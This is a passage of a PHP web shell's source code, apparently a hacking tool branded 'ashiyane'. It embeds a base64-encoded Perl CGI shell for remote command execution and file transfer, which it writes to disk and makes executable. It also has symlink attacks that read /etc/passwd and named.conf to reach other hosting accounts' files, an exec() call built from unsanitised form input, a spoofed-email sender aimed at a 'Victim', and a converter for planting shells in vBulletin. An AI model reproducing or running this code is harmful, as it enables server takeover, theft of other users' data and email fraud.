DxTRU5ERklMRT4pOw0KCQljbG9zZShTRU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAkITwvY29kZT4iOw0KCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlDQojIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsgdGhyb3VnaCB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMgVGhpcyBmdW5jdGlvbiBpcyBhbHNvIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGNsaWNrcyBvbiB0aGF0IGxpbmsuIEluIHRoaXMgY2FzZSwNCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCZWdpbkRvd25sb2FkDQp7DQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUNCiMgZmlsZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBzdGFydHMgdGhlIHVwbG9hZCBwcm9jZXNzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFVwbG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4NCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQkmUHJpbnRGaWxlVXBsb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoNCgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2Vzcw0KCXByaW50ICI8Y29kZT5VcGxvYWRpbmcgJFRyYW5zZmVyRmlsZSB0byAkQ3VycmVudERpci4uLjxicj4iOw0KDQoJIyBnZXQgdGhlIGZ1bGxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgY3JlYXRlZA0KCWNob3AoJFRhcmdldE5hbWUpIGlmICgkVGFyZ2V0TmFtZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7DQoJJFRhcmdldE5hbWUgLj0gJFBhdGhTZXAuJDE7DQoNCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsNCgkjIGlmIHRoZSBmaWxlIGV4aXN0cyBhbmQgd2UgYXJlIG5vdCBzdXBwb3NlZCB0byBvdmVyd3JpdGUgaXQNCglpZigtZSAkVGFyZ2V0TmFtZSAmJiAkT3B0aW9ucyBuZSAib3ZlcndyaXRlIikNCgl7DQoJCXByaW50ICJGYWlsZWQ6IERlc3RpbmF0aW9uIGZpbGUgYWxyZWFkeSBleGlzdHMuPGJyPiI7DQoJfQ0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50DQoJew0KCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkNCgkJew0KCQkJYmlubW9kZShVUExPQURGSUxFKSBpZiAkV2luTlQ7DQoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsNCgkJCWNsb3NlKFVQTE9BREZJTEUpOw0KCQkJcHJpbnQgIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOw0KCQkJcHJpbnQgIkZpbGUgUGF0aDogJFRhcmdldE5hbWU8YnI+IjsNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7DQoJCX0NCgl9DQoJcHJpbnQgIjwvY29kZT4iOw0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluaw0KIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBEb3dubG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQoNCiRBY3Rpb24gPSAkaW57J2EnfTsNCiRBY3Rpb24gPSAibG9naW4iIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0DQoNCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQNCiRDdXJyZW50RGlyID0gJGlueydkJ307DQpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4NCnsNCgkmUGVyZm9ybUxvZ2luOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpICMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kDQp7DQoJJkV4ZWN1dGVDb21tYW5kOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUNCnsNCgkmVXBsb2FkRmlsZTsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQ0Kew0KCSZEb3dubG9hZEZpbGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJsb2dvdXQiKSAjIHVzZXIgd2FudHMgdG8gbG9nb3V0DQp7DQoJJlBlcmZvcm1Mb2dvdXQ7DQp9DQoNCg0K
2594
2595";
2596$ashiyane6 = fopen('cgi.ashiyane','w+');
2597$ashiyane7 = fwrite ($ashiyane6 ,base64_decode($ashiyane5));
2598fclose($ashiyane6);
2599chmod('cgi.ashiyane',0755);
2600echo '<a name="down"></a><iframe src=cgiashiyane/cgi.ashiyane width=100% height=600px frameborder=0></iframe> ';
2601
2602
2603
2604 }
2605
2606 if($action=="sym"){
2607 echo "<style>#sym{background: #A81F1F}</style>";
2608
2609 ?>
2610 <div style="font-size:20px">
2611 <center>
2612 <a href="?action=sym&sym=dsym"><input type="button" value="Domains"></a>
2613 <a href="?action=sym&sym=dusym"><input type="button" value="Domains User Symlink"></a>
2614 <a href="?action=sym&sym=passwd"><input type="button" value="Passwd Symlink"></a>
2615 <a href="?action=sym&sym=fsym"><input type="button" value="File Symlinker"></a>
2616 <a href="?action=sym&sym=dasym"><input type="button" value="Direct Admin Symlink"></a>
2617 </center>
2618 <br /><br />
2619 </div>
2620 <?php
2621 if(isset($_GET['sym']) && $_GET['sym']=="dusym"){
2622 if(!@file_exists("/etc/virtual/domainowners")){
2623@set_time_limit(0);
2624echo "<center>";
2625@mkdir('sym',0777);
2626$ht = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2627$htfile =@fopen ('sym/.htaccess','w');
2628fwrite($htfile ,$ht);
2629@symlink('/','sym/root');
2630$basename = basename('_FILE_');
2631$namedfile = @file('/etc/named.conf');
2632if(!$namedfile)
2633{
2634echo "<b><font color=\"#FFFFFF\">Cant access /etc/named.conf on server</b></font></center>";
2635}
2636else
2637{
2638echo "<br>";
2639echo "<table align='center' width='40%' class='syms'>
2640<td><font color=\"#FFFFFF\"><b><center># Count</center></font></b></td>
2641<td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td>
2642<td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
2643<td><font color=\"#FFFFFF\"><b><center>symlink</center></font></b></td>";
2644$count=1;
2645foreach($namedfile as $namedfiles){
2646if(@eregi('zone',$namedfiles)){
2647preg_match_all('#zone "(.*)"#',$namedfiles,$namedfiles2);
2648flush();
2649if(strlen(trim($namedfiles2[1][0])) >2){
2650$valiasesfile = posix_getpwuid(@fileowner('/etc/valiases/'.$namedfiles2[1][0]));
2651$valiasfilename = $valiasesfile['name'];
2652@symlink('/','sym/root');
2653$valiasfilename = $namedfiles2[1][0];
2654$irdom = '\.ir';
2655$ildom = '\.il';
2656if (@eregi("$irdom",$namedfiles2[1][0]) or @eregi("$ildom",$namedfiles2[1][0]) ){
2657$valiasfilename = "<b><font style=\"color:#FFFFFF\">".$namedfiles2[1][0].'</font></b>';
2658}
2659echo "<tr><td><font color=\"#FFFFFF\">{$count}</font></td><td><a target='_blank' href=http://www.".$namedfiles2[1][0].'/><font color=#FFFFFF><b>'.$valiasfilename.'</b> </a></font></td><td><font color="white"><b>'.$valiasesfile['name']."</font></b></td><td><a href='sym/root/home/".$valiasesfile['name']."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";flush();
2660$count++;}}}}
2661} else {
2662echo '<center><br><font color="#FFFFFF">This is Server DirectAdmin Use </font><font color="#FF0000"><a href="?action=sym&sym=dasym">Symlink for Direct Admin</a></font></b></center> ';
2663}
2664echo "</center></table>";
2665 }
2666 if(isset($_GET['sym']) && $_GET['sym']=="dasym"){
2667
2668 if(@file_exists("/etc/virtual/domainowners")){
2669@mkdir('sym',0777);
2670$ht = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2671$htfile =@fopen ('sym/.htaccess','w');
2672fwrite($htfile ,$ht);
2673@symlink('/','sym/root');
2674fclose($htfile);
2675$res = @file("/etc/virtual/domainowners");
2676$count=1;
2677echo "<br>";
2678echo "<table align='center' width='40%' class='syms'>
2679<td><font color=\"#FFFFFF\"><b><center># Count</center></font></b></td>
2680<td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td>
2681<td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
2682<td><font color=\"#FFFFFF\"><b><center>symlink</center></font></b></td>";
2683foreach($res as $hid){
2684if(@eregi(":",$hid)){
2685$exfile = explode(':', $hid);
2686echo "<tr><td><font color=\"#FFFFFF\">{$count}</font></td><td><a target='_blank' href=http://www.".trim($exfile[0]).'/><font color=\"#FFFFFF\"><b>'.trim($exfile[0]).'</b> </font></a></td><td><font color="white"><b>'.trim($exfile[1])."</font></b></td><td><a href='sym/root/home/".trim($exfile[1])."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";flush();
2687$count++;}}echo "</table>";}else{echo '<center><br><font color="#FFFFFF">This is Server Cpanel Please Use </font><font color="#FF0000"><a href="?action=sym&sym=dusym">Symlink for Cpanel</a></font></b><br></center>';}
2688
2689 }
2690 if(isset($_GET['sym']) && $_GET['sym']=="dsym"){
2691
2692
2693if(!@file_exists("/etc/virtual/domainowners")){
2694echo "<center>";
2695echo "<br>";
2696$d0mains = @file("/etc/named.conf");
2697if(!$d0mains){
2698
2699echo "<b><font color=\"#FFFFFF\">Cant access /etc/named.conf on server</b></font></center>"; }
2700echo "<br><table align='center' width='40%' class='syms'><td><font color=\"#FFFFFF\"><b><center>#Count</center></font></b></td><td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td><td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>";
2701$count=1;
2702if (is_array($d0mains) || is_object($d0mains))
2703{
2704foreach($d0mains as $d0main){
2705if(@eregi("zone",$d0main)){
2706preg_match_all('#zone "(.*)"#', $d0main, $domains);
2707flush();
2708if(strlen(trim($domains[1][0])) > 2){
2709$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2710echo "<tr><td><b><font color=\"#FFFFFF\">".$count."</b></font></td><td><a href=http://www.".$domains[1][0]."/><font color=\"#FFFFFF\"><b>".$domains[1][0]."</font></b></a></td><td><b><font color=\"#FFFFFF\">".$user['name']."</font></b></td></tr>";flush();
2711$count++;
2712}}}
2713}
2714echo "</center></table>";
2715}else{echo '<center><br><font color="#FFFFFF">This Server is DirectAdmin Please Use </font><font color="#FF0000"><a href="?action=sym&sym=dasym">Symlink for Direct Admin</a></font> </center>';}
2716
2717
2718 }
2719 if(isset($_GET['sym']) && $_GET['sym']=="passwd"){
2720
2721
2722@mkdir('sym',0777);
2723$htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2724$f =@fopen ('sym/.htaccess','w');
2725fwrite($f , $htcs);
2726
2727
2728
2729@symlink("/","sym/root");
2730
2731$pg = basename(__FILE__);
2732
2733
2734 if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
2735
2736
2737$cont = stripcslashes($_POST['file']);
2738
2739if(!file_exists('passwd.txt')){
2740
2741$f = @fopen('passwd.txt','w');
2742
2743$w = @fwrite($f,$cont);
2744
2745fclose($f);
2746}
2747if($w or @filesize('passwd.txt') > 0){
2748
2749echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
2750flush();
2751
2752$fil3 = file('passwd.txt');
2753
2754foreach ($fil3 as $f){
2755
2756 $u=explode(':', $f);
2757 $user = $u['0'];
2758
2759
2760
2761echo "
2762<tr>
2763
2764
2765
2766<td width='15%'>
2767$user
2768</td>
2769<td width='10%'>
2770<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
2771</td>
2772
2773<td width='10%'>
2774<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
2775</td>
2776
2777
2778
2779</tr></div> ";
2780
2781
2782flush();
2783flush();
2784
2785
2786}
2787
2788
2789
2790
2791
2792
2793die ("</tr></div>");
2794
2795
2796 }
2797
2798
2799
2800
2801
2802}
2803
2804
2805
2806echo "<center>Read /etc/passwd";
2807echo "<br /><br /><form method='post' action='?action=sym&sym=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
2808flush();
2809
2810$file = '/etc/passwd';
2811
2812
2813$r3ad = @fopen($file, 'r');
2814if ($r3ad){
2815$content = @fread($r3ad, @filesize($file));
2816echo "".htmlentities($content)."";
2817}
2818elseif(!$r3ad)
2819{
2820$r3ad = @show_source($file) ;
2821}
2822elseif(!$r3ad)
2823{
2824$r3ad = @highlight_file($file);
2825}
2826elseif(!$r3ad)
2827{
2828
2829 for($uid=0;$uid<1000;$uid++){
2830 $ara = posix_getpwuid($uid);
2831 if (!empty($ara)) {
2832 while (list ($key, $val) = each($ara)){
2833 print "$val:";
2834 }
2835 print "\n";
2836 }
2837
2838 }
2839
2840 }
2841
2842
2843flush();
2844
2845
2846echo "</textarea><br /><br /><input type='submit' value=' symlink '/> </form></center>";
2847flush();
2848 }
2849
2850 if(isset($_GET['sym']) && $_GET['sym']=="fsym"){
2851
2852 echo'<center>The file path to symlink :
2853
2854<br /><br />
2855
2856<form method="post" action="?action=sym&sym=fsym">
2857<input type="text" name="file" value="/home/user/public_html/[File Name]" size="60"/><br /><br />
2858<input type="text" name="symfile" value="sym.txt" size="60"/><br /><br />
2859<input type="submit" value="symlink" name="symlink" /> <br /><br />
2860</form>
2861</center>
2862';
2863
2864if(isset($_POST['file']) && isset($_POST['symfile']) & isset($_POST['symlink'])){
2865$path_file = $_POST['file'];
2866$symfile = $_POST['symfile'];
2867$symlink = $_POST['symlink'];
2868
2869if ($symlink)
2870{
2871@mkdir('symlink',0777);
2872$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n";
2873$f =@fopen ('symlink/.htaccess','w');
2874@fwrite($f , $c);
2875@symlink("$path_file","symlink/$symfile");
2876echo '<br /><a target="_blank" href="symlink/'.$symfile.'" >'.$symfile.'</a>';
2877}
2878
2879}
2880
2881 }
2882
2883 }
2884 if($action=="zipper"){
2885 if (class_exists('ZipArchive')){
2886echo '
2887<center>
2888<br /><br />
2889<form actoin="?action=zipper&dir='.$path.'#down" method="post">
2890<a name="down"></a>
2891<font color="#FFFFFF"><b>Dir:</b> </font> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['path']).'" size="60"/><br /><br />
2892<font color="#FFFFFF"><b>Save Dir: </b></font><input type="text" name="zipfile" value="ashiyane.zip" size="60"/><br /><br />
2893<input type="submit" value=">>" name="ziper" /> <br /><br />
2894</form></center>
2895';
2896
2897
2898$code = base64_decode('ICAgIGlmICghZXh0ZW5zaW9uX2xvYWRlZCgnemlwJykgfHwgIWZpbGVfZXhpc3RzKCRzb3VyY2UpKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICAkemlwID0gbmV3IFppcEFyY2hpdmUoKTsNCiAgICBpZiAoISR6aXAtPm9wZW4oJGRlc3RpbmF0aW9uLCBaSVBBUkNISVZFOjpDUkVBVEUpKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICAkc291cmNlID0gc3RyX3JlcGxhY2UoJ1xcJywgJy8nLCByZWFscGF0aCgkc291cmNlKSk7DQoNCiAgICBpZiAoaXNfZGlyKCRzb3VyY2UpID09PSB0cnVlKQ0KICAgIHsNCiAgICAgICAgJGZpbGVzID0gbmV3IFJlY3Vyc2l2ZUl0ZXJhdG9ySXRlcmF0b3IobmV3IFJlY3Vyc2l2ZURpcmVjdG9yeUl0ZXJhdG9yKCRzb3VyY2UpLCBSZWN1cnNpdmVJdGVyYXRvckl0ZXJhdG9yOjpTRUxGX0ZJUlNUKTsNCg0KICAgICAgICBmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpDQogICAgICAgIHsNCiAgICAgICAgICAgICRmaWxlID0gc3RyX3JlcGxhY2UoJ1xcJywgJy8nLCAkZmlsZSk7DQoNCiAgICAgICAgICAgIC8vIElnbm9yZSAiLiIgYW5kICIuLiIgZm9sZGVycw0KICAgICAgICAgICAgaWYoIGluX2FycmF5KHN1YnN0cigkZmlsZSwgc3RycnBvcygkZmlsZSwgJy8nKSsxKSwgYXJyYXkoJy4nLCAnLi4nKSkgKQ0KICAgICAgICAgICAgICAgIGNvbnRpbnVlOw0KDQogICAgICAgICAgICAkZmlsZSA9IHJlYWxwYXRoKCRmaWxlKTsNCg0KICAgICAgICAgICAgaWYgKGlzX2RpcigkZmlsZSkgPT09IHRydWUpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgJHppcC0+YWRkRW1wdHlEaXIoc3RyX3JlcGxhY2UoJHNvdXJjZSAuICcvJywgJycsICRmaWxlIC4gJy8nKSk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlIGlmIChpc19maWxlKCRmaWxlKSA9PT0gdHJ1ZSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkemlwLT5hZGRGcm9tU3RyaW5nKHN0cl9yZXBsYWNlKCRzb3VyY2UgLiAnLycsICcnLCAkZmlsZSksIGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQogICAgZWxzZSBpZiAoaXNfZmlsZSgkc291cmNlKSA9PT0gdHJ1ZSkNCiAgICB7DQogICAgICAgICR6aXAtPmFkZEZyb21TdHJpbmcoYmFzZW5hbWUoJHNvdXJjZSksIGZpbGVfZ2V0X2NvbnRlbnRzKCRzb3VyY2UpKTsNCiAgICB9DQoNCiAgICByZXR1cm4gJHppcC0+Y2xvc2UoKTs=');
2899
2900
2901
2902if(isset($_POST['ziper']) && ($_POST['ziper'] == '>>'))
2903{
2904$newfunc = create_function('$source,$destination', $code);
2905
2906$dirzip = $_POST['dirzip'];
2907$zipfile = $_POST['zipfile'];
2908if($newfunc($dirzip, $zipfile)){
2909echo '<b><span style="color:green">Directory Or File Ziped Successfully !</span></b><Br>';
2910}else {echo '<b><span style="color:red">Error!!!...</span></b><Br>';}
2911}
2912}
2913else {
2914echo '
2915<center>
2916<br /><br />
2917<form action="?action=zipper&dir='.$path.'#down" method="post">
2918<a name="down"></a>
2919Dir: <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['path']).'" size="60"/><br /><br />
2920Save Dir: <input type="text" name="zipfile" value="ashiyane.zip" size="60"/><br /><br />
2921<input type="submit" value=">>" name="ziper" /> <br /><br />
2922</form></center>
2923';
2924if(isset($_POST['ziper']) && ($_POST['ziper'] == '>>'))
2925
2926{
2927$dirzip = trim($_POST['dirzip']);
2928$zipfile = trim($_POST['zipfile']);
2929if(exec("zip -r $zipfile $dirzip")){
2930echo '<b><span style="color:green">Directory Or File Ziped Successfully !</span></b><br>';
2931}else {echo '<b><span style="color:red">ERROR!!!...</span></b><br>';}
2932}
2933}
2934 }
2935
2936 if($action=="fakemail"){
2937
2938 echo '
2939<center><form action="?action=fakemail&dir='.$path.'#down" method="post">
2940<a name="down"></a>
2941<table>
2942<tr>
2943<td>
2944<font color="#FFF"><b>Mail to : </b></font></td><td><input placeholder="Victim" size="30" type="email" name="mailto" />
2945</td>
2946</tr>
2947<tr>
2948<td>
2949<font color="#FFF"><b>From : </b></font></td><td><input type="email" size="30" placeholder="Hacker@mail.com" name="mailfrom" />
2950</td>
2951</tr>
2952<tr>
2953<td>
2954<font color="#FFF"><b>Subject : </b></font></td><td><input type="text" size="30" value="Your Site Has Been Hacked" name="mailsubject" />
2955</td>
2956</tr>
2957</table><br>
2958<textarea rows="6" cols="60" name="mailcontent">Hi Admin :)</textarea>
2959<br><input type="submit" value=">>" name="mailsend" />
2960</form></center><br><br>';
2961if(isset($_POST['mailsend']) && ($_POST['mailsend'] == '>>'))
2962{
2963$mailto = $_POST['mailto'];
2964$mailfrom = $_POST['mailfrom'];
2965$mailsubject = $_POST['mailsubject'];
2966$mailcontent = $_POST['mailcontent'];
2967if(@mail($mailto,$mailsubject,$mailcontent,"FROM:$mailfrom"))
2968{ echo '<center><span style="color:green"><b>Mail successfully Sent!</b></span></center>'; }
2969else echo '<center><span style="color:red"><b>Mail Not Sent!</b></span></center>';
2970}
2971
2972
2973 }
2974
2975 if($action=="php2xml"){
2976
2977 echo"
2978<center>
2979<b><font>Convert PHP To XML For Vbulletin Shell</font></b>
2980<form action=\"?action=php2xml&dir=$path#down\" method='post'>
2981<a name=\"down\"></a>
2982<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
2983<input type='submit' name='go' value='Convert' /> <input type='reset' value='Clear' name='reset'><br/><br/>
2984</p>
2985</form></center>";
2986if(isset($_POST['go']) && $_POST['go'] == 'Convert' ) {
2987if ( get_magic_quotes_gpc() ){
2988$code=stripslashes($_POST['code']);
